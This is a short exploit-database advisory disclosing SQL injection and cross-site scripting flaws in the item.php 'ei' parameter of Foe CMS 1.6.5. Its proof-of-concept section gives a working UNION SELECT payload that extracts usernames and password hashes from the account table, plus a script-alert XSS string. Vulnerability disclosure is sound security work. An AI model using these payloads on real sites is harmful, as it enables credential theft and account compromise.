[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Foe CMS 1.6.5 - Multiple Vulnerabilities
# Published : 2013-04-29
# Author :
# Previous Title : Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability
# Next Title : Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection
Title: Foe CMS 1.6.5 SQL Injection Vulnerability
Vendor: http://foecms.com/
Download: http://code.google.com/p/foecms/downloads/list
Versions: 1.6.5
Platform: linux, windows
Bug: SQL Injection | Cross Site Scripting
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========
Gestor de categorias (Como phpbb3)
Pasar a php orientado a objetos
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite a?adir y quitar campos a gusto
Permisos segun rangos para TODO
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)
======
2) Bug
======
SQL Injection
http://victim/[path]/item.php?ei=[SQLi]
Cross Site Scripting
http://victim/[path]/item.php?ei=[XSS]
=====
3)proof of concept
=====
Example SQLi
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--
Example XSS
http://victim/[path]/item.php?ei=<script>alert(1)</script>
=====
4)Credits
=====
flux77
Contact : 0xflux77 at gmail.com